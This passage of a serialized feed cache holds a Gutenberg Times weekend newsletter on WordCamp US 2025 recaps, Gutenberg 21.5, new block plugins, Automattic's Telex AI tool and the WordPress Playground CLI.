#339\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=41640\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"https://gutenbergtimes.com/accordion-block-automattic-telex-playground-cli-and-more-weekend-edition-339/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:30809:\"<p>Hi,</p>\n\n\n\n<p>WordCamp US was a blast, although a four-day WordCamp felt weird. And after day four I was exhausted. I am almost done dealing with jet lag coming back from the nine-hour time difference. Interestingly enough, I saw way more talks than at previous WordCamps and I enjoyed learning new things. I also caught up with many long-time WordPress friends, most of whom I haven&#8217;t seen since the pandemic. My heart is full. <img alt=\"💕\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f495.png\" style=\"height: 1em;\" /> </p>\n\n\n\n<p>More on WordCamp US below.</p>\n\n\n\n<p>I also caught up on a lot of stuff from the rest of the WordPress world, so this weekend edition is really packed.</p>\n\n\n\n<p>Wishing you a fantastic weekend. </p>\n\n\n\n<p>Yours, <img alt=\"💕\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f495.png\" style=\"height: 1em;\" /><br /><em>Birgit</em></p>\n\n\n\n\n<div class=\"wp-block-newsletterglue-showhide ng-block\" width=\"100%\"></div>\n\n\n<h2 class=\"wp-block-heading\" id=\"wordcamp-us-2025\">WordCamp US 2025</h2>\n\n\n\n<p>For this week, I just link some recaps post and collect the WordPress TV links of the talks. More to come over the next weeks or so. </p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"recap-posts\">Recap posts</h3>\n\n\n\n<p>There are already quite a few recap posts about WordPress US published. Here is a selection:</p>\n\n\n\n<p><strong>Brett McSherry</strong> published a recap: <a href=\"https://wordpress.org/news/2025/08/portland-welcomes-wcus-2025/\"><strong>Portland Welcomes WordCamp US 2025: A Community Gathering</strong></a></p>\n\n\n\n<p>So did <strong>Rae Morey</strong> at The Repository <a href=\"https://www.therepository.email/wordcamp-us-2025-wraps-in-portland-ai-demos-student-programs-and-whats-next-for-wordpress\" rel=\"noreferrer noopener\" target=\"_blank\"><strong>WordCamp US 2025 Wraps in Portland: AI Demos, Student Programs, and What’s Next for WordPress</strong></a></p>\n\n\n\n<p><strong>Andy Fragen</strong> shared his photo album: <a href=\"https://thefragens.com/wcus-2025-in-pictures/\"><strong>WCUS 2025 in Pictures.</strong></a></p>\n\n\n\n<p>Communications Lead at DreamHost, <strong>Annette Irwin</strong>, reported extensively from each day in Portland, OR:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https://www.dreamhost.com/news/announcements/inside-wordcamp-us-2025-contributor-day/\">Inside WordCamp US 2025 Contributor Day</a></li>\n\n\n\n<li><a href=\"https://www.dreamhost.com/news/announcements/wordcamp-us-2025-showcase-day-where-wordpress-comes-to-life/\">WordCamp US 2025: Showcase Day — Where WordPress Comes to Life</a></li>\n\n\n\n<li><a href=\"https://www.dreamhost.com/news/announcements/wordcamp-us-2025-day-3-recap-innovation-energy-and-community/\">WordCamp US 2025: Day 3 Recap— Innovation, Energy, and Community</a></li>\n\n\n\n<li><a href=\"https://www.dreamhost.com/news/announcements/wordcamp-us-2025-day-4-ai-insights-and-a-fond-farewell/\">WordCamp US 2025 Day 4: AI Insights and a Fond Farewell</a></li>\n</ul>\n\n\n\n<p><a href=\"https://wordpress.com/blog/2025/09/05/wordcamp-us-2025-recap/\"><strong>The 5 Best Things About WordCamp US 2025</strong></a> by Tess Needham, WordPress.com</p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"recordings\">Recordings </h3>\n\n\n\n<p>The WordCamp US Livestream recordings are <a href=\"https://youtube.com/playlist?list=PL1pJFUVKQ7ERiUTP1Mt_yhRDOzESEoodI\">available on YouTube</a>. The AV team is in the process of <a href=\"https://wordpress.tv/event/wordcamp-us-2025/\">uploading single talks to WordPressTV</a></p>\n\n\n\n<p>Here is the list of talks I shared in <a href=\"https://gutenbergtimes.com/wordcamp-us-more-blocks-a-new-book-gutenberg-21-4-and-wordpress-6-9-weekend-edition-338/\">Weekend Edition 338</a>, now with the links to the recordings on WordPress TV</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Joeleen Kennedy</strong>: <a href=\"https://wordpress.tv/2025/09/03/modernizing-at-scale-how-fse-supports-wikimedias-evolving-ux/\">Modernizing at Scale: How FSE Supports Wikimedia’s Evolving UX</a></li>\n\n\n\n<li><strong>Josh Bryant</strong>: <a href=\"https://wordpress.tv/2025/09/03/reimagining-wordpress-editing-how-we-embedded-gutenberg-into-our-product-ecosystem/\">Reimagining WordPress Editing: How We Embedded Gutenberg Into Our Product Ecosystem</a></li>\n\n\n\n<li><strong>Seth Rubenstein</strong>: <a href=\"https://wordpress.tv/2025/09/03/block-composability-the-past-and-the-future/\">Block Composability: The Past and The Future</a></li>\n\n\n\n<li><strong>Stephanie Stelzer</strong>: <a href=\"https://wordpress.tv/2025/09/03/coding-the-magic-a-developers-journey-through-aloha/\">Coding the Magic: A Developer’s Journey Through Aloha</a></li>\n\n\n\n<li><strong>Mary Ann Aschenbrenner</strong>: <a href=\"https://wordpress.tv/2025/09/03/moving-a-website-from-classic-to-a-block-theme/\">Moving a Website from Classic to a Block Theme</a></li>\n\n\n\n<li><strong>Anton Plauch</strong>e: <a href=\"https://wordpress.tv/2025/09/03/building-resilient-interfaces-by-embracing-fluid-design/\">Building Resilient Interfaces by Embracing Fluid Design</a></li>\n\n\n\n<li><strong>Jemima Abu</strong>: <a href=\"https://wordpress.tv/2025/09/03/a-php-developers-guide-to-reactjs/\">A PHP Developer’s Guide to ReactJS</a></li>\n\n\n\n<li><strong>Michelle Schlup Hunt</strong>: <a href=\"https://wordpress.tv/2025/09/03/building-experiences-design-systems-user-experience-and-full-site-editing/\">Building Experiences: Design Systems, User Experience, and Full Site Editing</a></li>\n\n\n\n<li><strong>Tammie Lister</strong>: <a href=\"https://wordpress.tv/2025/09/03/the-system-is-the-strategy/\">The System is the Strategy</a><br /></li>\n</ul>\n\n\n\n<p>AI was a big topic at WCUS 2025 with about a dozen talks from various angles. My recommendations are: </p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>For developers, check out <strong>Adam Silverstein</strong>’s talk, <a href=\"https://wordpress.tv/2025/09/03/unlock-developer-superpowers-with-ai/\">Unlock Developer Superpowers with AI,</a> as he has tested quite a few tools and can give a great rundown about his approach. </li>\n\n\n\n<li>For non-developers, if you need an introduction on how to think about AI, watch <strong>John Maeda</strong>’s talk <a href=\"https://wordpress.tv/2025/09/03/cozy-ai-cooking-wordcamp-edition/\">Cozy AI Cooking: WordCamp Edition</a></li>\n\n\n\n<li>If you want to be amazed by what’s happening in other areas of science, I highly recommend <strong>Prof. Adam Gazzaley</strong>&#8216;s talk, <a href=\"https://wordpress.tv/2025/09/03/a-new-era-of-experiential-medicine-ai-and-the-brain/\">A New Era of Experiential Medicine – AI and the Brain</a> </li>\n</ul>\n\n\n\n<p>The <a href=\"https://wordpress.tv/event/wordcamp-us-2025/\">full list of talks is available on WordPress TV here.</a></p>\n\n\n\n<p>The recordings of the workshops are not yet available. I&#8217;ll share them in a future Weekend Edition. </p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"major-wordpress-events-in-2026\">Major WordPress events in 2026 </h2>\n\n\n\n<p>2026 is still many months away, but you can&#8217;t plan soon enough. Save the dates! </p>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"has-fixed-layout\"><thead><tr><th>Dates</th><th>Name of the Event</th><th>Location</th></tr></thead><tbody><tr><td>January 23-24, 2026</td><td><a href=\"https://nepal.wordcamp.org/2026/\">WordCamp Nepal</a></td><td>Butwal, Nepal</td></tr><tr><td>April 8-11, 2026</td><td><a href=\"https://pressconf.events/\">PressConf</a></td><td>Phoenix, Arizona, USA</td></tr><tr><td>April 9–11, 2026</td><td><a href=\"https://asia.wordcamp.org/2026/\">WordCamp Asia </a></td><td>Mumbai, India </td></tr><tr><td>April 23-24, 2026</td><td><a href=\"https://checkoutsummit.com/\">Checkout Summit</a></td><td>Palermo, Italy</td></tr><tr><td>June 4-6, 2026</td><td><a href=\"https://europe.wordcamp.org/2026/\">WordCamp Europe</a></td><td>Krakow, Poland</td></tr><tr><td>August 16-19, 2026</td><td>WordCamp US</td><td>Phoenix, Arizona, USA</td></tr></tbody></table></figure>\n\n\n\n<p>Many more WordCamps are in the early stages. You can check out the <a href=\"https://central.wordcamp.org/schedule/\">schedule on WordCamp.org</a> and also review the WordCamps planned for the rest of 2025. </p>\n\n\n\n<p>For the remainder of 2025, I just booked my flight to Gdansk to attend <a href=\"https://gdynia.wordcamp.org/2025/\"><strong>WordCamp Gdynia</strong></a>, September 26 &#8211; 28, the first bilingual WordCamp in Poland. And I am contemplating attending <a href=\"https://pisa.wordcamp.org/2025/\"><strong>WordCamp Pisa</strong></a> in November.</p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-word-press-release-information\">Developing Gutenberg and WordPress</h2>\n\n\n\n<p><strong>Anne McCarthy</strong> and I joined <strong>Nathan Wrigley</strong> on the <strong><a href=\"https://wpbuilds.com/2025/09/04/435-at-the-core-with-birgit-pauli-haack-and-anne-mccarthy-episode-4/\">4th episode of the &#8220;At the Core&#8221; podcast</a></strong> series of WPBuilds. We talked about the Admins design and AI building blocks, the Roadmap for 6.9, the command line for WPAdmin, and Speculative loading. It was a fun, fast-paced conversation.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https://wpbuilds.com/2025/09/04/435-at-the-core-with-birgit-pauli-haack-and-anne-mccarthy-episode-4/\"><img alt=\"\" class=\"wp-image-41742\" height=\"343\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/WP-Builds-Podcast-Episode-435.webp?resize=652%2C343&#038;ssl=1\" width=\"652\" /></a></figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Aki Hamano</strong> released Gutenberg 21.5 and highlighted in his post <a href=\"https://make.wordpress.org/core/2025/08/28/whats-new-in-gutenberg-21-5/\">What’s new in Gutenberg 21.5? (27 August)</a> </p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><a href=\"https://make.wordpress.org/core/2025/08/28/whats-new-in-gutenberg-21-5/#introducing-accordion-block\">Introducing Accordion block</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2025/08/28/whats-new-in-gutenberg-21-5/#command-palette-in-admin-dashboard\">Command Palette in admin dashboard</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2025/08/28/whats-new-in-gutenberg-21-5/#support-border-radius-presets\">Support border radius presets</a></li>\n</ol>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"\" class=\"wp-image-41725\" height=\"368\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/accordion-block.png?resize=652%2C368&#038;ssl=1\" width=\"652\" /></figure>\n\n\n\n<div class=\"wp-block-group has-light-background-background-color has-background\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<p><img alt=\"🎙\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f399.png\" style=\"height: 1em;\" /> The latest episode is <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-120-wordcamp-us-telex-gutenberg-21-4-and-21-5/\">Gutenberg Changelog 120—WordCamp US, Automattic Telex, Gutenberg 21.4 and 21.5, and the need for more blocks</a> with special guest <strong>Sarah Norris. </strong></p>\n\n\n\n<figure class=\"wp-block-image size-full is-style-no-vertical-margin\"><img alt=\"\" class=\"wp-image-41771\" height=\"207\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-05-at-14.12.23-edited.png?resize=652%2C207&#038;ssl=1\" width=\"652\" /></figure>\n\n\n\n<p class=\"has-small-font-size\"><em>If you are listening via Spotify, please leave a comment. If you listen via other podcast apps, please leave a review. It&#8217;ll help with the distribution.</em></p>\n</div></div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</h2>\n\n\n\n<p>In her post on the WooCommerce Developer Blog, <strong>Stephanie Pi</strong> walks you through the <a href=\"https://developer.woocommerce.com/2025/09/01/woocommerce-10-2-pre-release-updates/\"><strong>updates coming to WooCommerce 10.2</strong></a>. Get ready for the Product Collection Carousel and Bloc, simplified templates, a faster Cart Block, improved taxonomy filters, and so much more. Beta 2 is scheduled for September 8th, and the final release drops on September 16th, 2025.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"Product Carousel coming to WooCommerce 10.2 on September 16, 2025\" class=\"wp-image-41746\" height=\"317\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-04-at-16.13.10.png?resize=652%2C317&#038;ssl=1\" width=\"652\" /></figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Wes Theron</strong> explains in this video <a href=\"https://www.youtube.com/watch?v=JO-bn9jwarQ\"><strong>how to work with WordPress templates</strong></a>. You&#8217;ll learn the difference between pages and templates in WordPress and how templates control the layout and structure of your pages—including headers, footers, and content—without affecting the content itself. Theron explored how editing templates impacts all pages using them, and showed practical examples using the Pages Template, Single Posts Template, All Archives Template, 404 Template, and your homepage.</p>\n\n\n<div class=\"wp-block-newsletterglue-showhide ng-block\" width=\"100%\">\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n\n</div></figure>\n</div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Ajit Bohra</strong>, Lubus, <a href=\"https://x.com/ajitbohra/status/1962503463046365553\">announced</a> that their open-source <strong><a href=\"https://wordpress.org/plugins/blablablocks-tabs-block/\">Tabs Block</a></strong> is now available in the WordPress repository. Users can create horizontal or vertical tabs directly inside the WordPress Block Editor. Documentation can be found <a href=\"https://github.com/lubusIN/blablablocks-tabs-block/wiki\">on GitHub Wiki</a></p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"Tabs Block screenshot by Lubus.in\" class=\"wp-image-41722\" height=\"343\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Tabs-Block-LubusIN.png?resize=652%2C343&#038;ssl=1\" width=\"652\" /></figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Kevin Batdorf </strong>published the <a href=\"https://wordpress.org/plugins/fit-to-width/\"><strong>Fit To Width block</strong></a> in the WordPress repository. The block is used for displaying each line of text at full width, no matter the length of the text.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"screenshot of an example of the Fit-to-Width block by Kevin Batdorf\" class=\"wp-image-41729\" height=\"458\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/screenshot-1.jpg?resize=652%2C458&#038;ssl=1\" width=\"652\" /></figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Ryan Welcher</strong> released v4.3.0v of his <a href=\"https://wordpress.org/plugins/advanced-query-loop/\"><strong>Advanced Query Loop block</strong></a> in the WordPress repository. The update introduces a new post exclusion tool, a completely overhauled Post Meta Queries UI, and a new option for Meta Type.</p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</h2>\n\n\n\n<p><strong>Justin Tadlock</strong> posted his take on the overall question: <strong><a href=\"https://gutenbergtimes.com/why-wordpress-core-needs-more-blocks/\">Why WordPress Core needs more blocks</a>.</strong> He used to support keeping WordPress lean, but block themes changed everything. Now theme builders have way fewer tools compared to before—you can&#8217;t just include breadcrumbs, accordions, or icons without finding specific blocks for them. When users don&#8217;t have the right blocks installed, they get ugly error messages. He wants WordPress to include more core blocks like tabs, icons, and accordions so theme creators can actually build what they envision without hitting brick walls. What do you think? <a href=\"https://gutenbergtimes.com/why-wordpress-core-needs-more-blocks/#comments\">Leave a comment</a> on Tadlock&#8217;s post or on the GitHub issue: <a href=\"https://github.com/WordPress/gutenberg/issues/71026\">New Block additions for the Block Library</a>.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In January, <a href=\"https://wordpress.tv/speakers/arun-r-shenoy/\"><strong>Arun R Shenoy</strong></a> held a talk at WordCamp Kolhapur with the title <strong><a href=\"https://wordpress.tv/2025/08/19/crafting-attractive-block-themes-using-the-block-editor-alone/\">Crafting Attractive Block Themes Using the Block Editor Alone</a></strong>. The recording is now online on WordPressTV. Shenoy explored &#8220;minimalist design and the capabilities of the Block Editor. No coding or complex tools—just the editor and your creative vision.&#8221; He explained the basics for those who haven&#8217;t used the Site Editor yet and want to learn more. The <a href=\"https://kolhapur.wordcamp.org/2025/files/2024/12/WordCamp-Kolhapur-2025-Arun-R-Shenoy.pdf\">slidedeck</a> is also available online.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"Screenshot of Arun Shenoy\'s Talk at WordCamp Kolhapur\" class=\"wp-image-41734\" height=\"361\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-04-at-14.02.52.png?resize=652%2C361&#038;ssl=1\" width=\"652\" /></figure>\n\n\n<section class=\"wp-block-newsletterglue-callout undefined not-color-set\" style=\"border-color: #f9f9e5; border-radius: 22px; border-style: solid; border-width: 0; padding-top: 20px; padding-bottom: 20px; padding-left: 20px; padding-right: 20px; text-align: left; margin-left: 0; margin-right: 0; margin-top: 0px; margin-bottom: 0px; background-color: #f9f9e5;\">\n<p><strong> <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/\" rel=\"noreferrer noopener\" target=\"_blank\">&#8220;Keeping up with Gutenberg &#8211; Index 2025&#8221;</a> </strong><br />A chronological list of the WordPress Make Blog posts from various teams involved in Gutenberg development: Design, Theme Review Team, Core Editor, Core JS, Core CSS, Test, and Meta team from Jan. 2024 on. Updated by yours truly. The previous years are also available: <strong><strong><a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2020/\">2020</a> | <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2021/\">2021</a></strong> | <strong><a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2022/\">2022</a></strong></strong> | <strong><a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/gutenberg-index-2023\">2023</a></strong> | <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/gutenberg-index-2024/\"><strong>2024</strong></a></p>\n</section>\n\n\n<h2 class=\"wp-block-heading\" id=\"3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor</h2>\n\n\n\n<p>The head of engineering at The Code Company, <strong><a href=\"https://x.com/zachickson\">Zac Hickson</a></strong> took a look at the question: <a href=\"https://thecode.co/wordpress-interactivity-api-enterprise-ready/\"><strong>Is The WordPress Interactivity API Enterprise-Ready?</strong></a> After a year of testing, they found it’s good to go since WordPress 6.5, making things easier by cutting down technical debt and boosting performance while sticking to the WordPress ecosystem. It handles standard interactive bits pretty well, but you’ll want to plan carefully for those trickier apps. It’s perfect for teams that live and breathe WordPress and want a simpler front-end setup. </p>\n\n\n\n<p>The article takes a look at the WordPress Interactivity API by testing it out in real-life client projects. It dives into how ready it is technically, compares its performance against React, Vue, Alpine.js, and jQuery, and shares some cool case studies, like multi-site subscription systems and interactive camera demos. Plus, it gives some tips on how to implement it and some advice on when to pick this API over the others. The whole analysis is all about figuring out how doable this is for organizations that are all about WordPress.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>Author <strong>Paulo Carvajal</strong>&#8216;s new guide, <a href=\"https://wp-block-editor.com/mastering-complex-attributes-in-wordpress-blocks-handling-objects-arrays-and-nested-data/\"><strong>Mastering Complex Attributes in WordPress Blocks: Handling Objects, Arrays, and Nested Data</strong></a>, teaches developers how to work with complex data in block attributes beyond simple text and toggles. It covers arrays for repeatable content like galleries, objects for grouped settings, and nested data structures. The tutorial shows code examples for managing state properly, validating data, and handling performance issues. It explains how to create sophisticated blocks like testimonial sliders while keeping the editing experience user-friendly and avoiding common pitfalls with state management.</p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"wordpress-developer-blog\">WordPress Developer Blog</h3>\n\n\n\n<p><strong>Troy Chaplin</strong> continues sharing his experience, his workflow and plugin setup on the <em>WordPress Developer Blog</em> with two articles: </p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https://developer.wordpress.org/news/2025/08/refactoring-the-multi-block-plugin-build-smarter-register-cleaner-scale-easier/\"><strong>Refactoring the Multi-Block Plugin: Build Smarter, Register Cleaner, Scale Easier</strong></a><br />Refactor your multi-block plugin with a cleaner structure, support for all block types, and smarter registration, bundling, and asset handling.</li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/news/2025/09/implementing-namespaces-and-coding-standards-in-wordpress-plugin-development/\"><strong>Implementing Namespaces and Coding Standards in WordPress Plugin Development</strong></a><br />Add namespacing, autoloading, and linting to your multi-block plugin for clean, scalable WordPress development.</li>\n</ul>\n\n\n\n<p><strong>Don&#8217;t miss a new article ever again. <a href=\"https://developer.wordpress.org/news/subscribe/\">Subscribe to the WordPress Developer Blog!</a></strong></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Justin Tadlock</strong> and <strong>Abar Thakor</strong> discussed <a href=\"https://openchannels.fm/how-to-start-contributing-to-the-wordpress-developer-blog-even-if-youre-new/\"><strong>How to Start Contributing to the WordPress Developer Blog (Even If You’re New)</strong></a> in an episode on the OpenChannels network. Don&#8217;t wait to be an expert before contributing to the WordPress Developer Blog. Even beginners can share small solutions, guides, or case studies they&#8217;ve built. Start by browsing existing posts for inspiration, then share your idea on the <a href=\"https://github.com/WordPress/developer-blog-content/discussions/categories/topic-ideas\">GitHub discussion panel.</a> The editorial team is super helpful and will work with you to polish your writing. Your beginner perspective might be exactly what other new developers need to see.</p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"artificial-intelligence-ai-and-wordpress\">Artificial intelligence (AI) and WordPress</h2>\n\n\n\n<p>A new AI Tool, <a href=\"https://telex.automattic.ai/projects/new\"><strong>Automattic Telex</strong></a>, makes it easier to build Blocks for the block editor. <strong>Matt Mullenweg</strong> announced it in his keynote. </p>\n\n\n\n<p><strong>Rae Morey</strong>, The Repository, reports on the reception around the Interwebs. <a href=\"https://www.therepository.email/automattic-debuts-telex-bringing-ai-powered-vibe-coding-to-gutenberg-blocks\">Automattic Debuts Telex, Bringing AI-Powered “Vibe Coding” to Gutenberg Blocks</a>. </p>\n\n\n\n<p><strong>Sarah Perez</strong> at <em>TechCrunch</em> also picked up the story: <a href=\"https://techcrunch.com/2025/09/02/wordpress-shows-off-telex-its-experimental-ai-development-tool/\">WordPress shows off Telex, its experimental AI development tool</a></p>\n\n\n\n<p><a href=\"https://telex.automattic.ai/projects/new\">Don&#8217;t be shy, give it a whirl,</a> share your feedback, and leave a comment. <br /></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Grzegorz Ziółkowski</strong> <a href=\"https://github.com/WordPress/abilities-api/releases/tag/v0.1.0\">released</a> the <strong>Composer package <code>wordpress/abilities-api</code>.</strong> WordPress developers can now test the Abilities API before it officially launches in WordPress 6.9. The Abilities API creates a common language for all WordPress components to define their functionalities, making it easier for both humans and machines to understand. By using this shared language, plugins, and themes can help AI solutions find, interpret, and use capabilities across the WordPress ecosystem. You can learn more about this new feature on the <a href=\"https://make.wordpress.org/ai/2025/07/17/abilities-api/\">Make blog of the AI Team</a>. </p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"what-s-new-for-wordpress-playground\">What&#8217;s new for WordPress Playground</h2>\n\n\n\n<p>In this episode on the OpenChannels <a href=\"https://openchannels.fm/learn-how-wordpress-playground-revolutionizes-local-development-testing-and-learning/\">Learn How WordPress Playground Revolutionizes Local Development Testing and Learning</a> <strong>Abha Thakor</strong> and <strong>Fellyph Cintra</strong> discuss WordPress Playground, its features, accessibility, and impact on developers and users. One new feature is the Playground Command line interface (CLI). You can use the playground CLI to spin up a WordPress instance directly from your plugin or theme folder by using with the  <code>--auto-mount</code> flag with the command. This gives you a complete development environment in seconds.</p>\n\n\n\n<p class=\"has-light-background-background-color has-background\"><code>npx @wp-playground/cli server --auto-mount</code></p>\n\n\n\n<p>Recent updates also added a demo content for the plan Playground site, when accessing <a href=\"https://playground.wordpress.net\">playground.wordpress.net</a></p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"\" class=\"wp-image-41731\" height=\"363\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-04-at-13.37.00.png?resize=652%2C363&#038;ssl=1\" width=\"652\" /></figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n<section class=\"wp-block-newsletterglue-callout undefined not-color-set\" style=\"border-color: #eeeeee; border-radius: 26px; border-style: solid; border-width: 0; padding-top: 20px; padding-bottom: 20px; padding-left: 20px; padding-right: 20px; text-align: left; margin-left: 0; margin-right: 0; margin-top: 0px; margin-bottom: 0px; background-color: #f3efe9;\">\n<p><strong><a href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Need a plugin .zip from Gutenberg&#8217;s master branch?</a></strong><br />Gutenberg Times provides daily build for testing and review. </p>\n\n\n\n<p>Now also available via <a href=\"https://playground.wordpress.net/?blueprint-url=https://gutenbergtimes.com/wp-content/uploads/2020/11/playnightly.json\">WordPress Playground</a>. There is no need for a test site locally or on a server. Have you been using it? <a href=\"mailto:pauli@gutenbergtimes.com\">Email me </a>with your experience</p>\n\n\n\n<p><img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/bph/gutenberg/total?style=for-the-badge\" /></p>\n</section>\n\n\n<p class=\"has-text-align-center has-small-font-size\"><em>Questions? Suggestions? Ideas? </em><br /><em>Don&#8217;t hesitate to send <a href=\"mailto:pauli@gutenbergtimes.com\">them via email</a> or</em><br /><em> send me a message on WordPress Slack or Twitter @bph</em>.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p class=\"has-text-align-center has-small-font-size\">For questions to be answered on the <a href=\"http://gutenbergtimes.com/podcast\">Gutenberg Changelog</a>, <br />send them to <a href=\"mailto:changelog@gutenbergtimes.com\">changelog@gutenbergtimes.com</a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n<section class=\"wp-block-newsletterglue-group\" style=\"padding-top: 10px; padding-bottom: 10px; padding-left: 20px; padding-right: 20px; margin-top: 0px; margin-bottom: 0px;\">\n<p>Featured Image: Photo by Peter Nguyen on Unsplash</p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\n\n\n\n<p class=\"has-text-align-left\"><strong>Don&#8217;t want to miss the next Weekend Edition? </strong></p>\n\n\n<form action=\"https://gutenbergtimes.com/feed/\" autocomplete=\"on\" class=\"wp-block-newsletterglue-form ngl-form ngl-portrait\" method=\"post\"><div class=\"ngl-form-container\"><div class=\"ngl-form-field\" style=\"margin-bottom: 25px;\"><label class=\"ngl-form-label\" for=\"ngl_email\"><br />Type in your Email address to subscribe.</label><div class=\"ngl-form-input\"><input autocomplete=\"email\" class=\"ngl-form-input-text\" id=\"ngl_email\" name=\"ngl_email\" required=\"required\" style=\"border-radius: 21px;\" type=\"email\" /></div></div><button class=\"ngl-form-button\" style=\"background-color: #005075; border-color: #005075; border-width: 1px; border-style: solid; color: #ffffff; border-radius: 21px;\" type=\"submit\">Subscribe</button><p class=\"ngl-form-text\">We hate spam, too, and won&#8217;t give your email address to anyone <br />except Mailchimp to send out our Weekend Edition</p></div><div class=\"ngl-message-overlay\"><div class=\"ngl-message-svg-wrap\"><svg fill=\"none\" height=\"24\" stroke=\"#fff\" stroke-width=\"2\" viewBox=\"0 0 24 24\" width=\"24\" xmlns=\"http://www.w3.org/2000/svg\"><polyline points=\"20 6 9 17 4 12\"></polyline></svg></div><div class=\"ngl-message-overlay-text\">Thanks for subscribing.</div></div><input id=\"ngl_list_id\" name=\"ngl_list_id\" type=\"hidden\" value=\"26f81bd8ae\" /><input id=\"ngl_double_optin\" name=\"ngl_double_optin\" type=\"hidden\" value=\"yes\" /></form>\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" 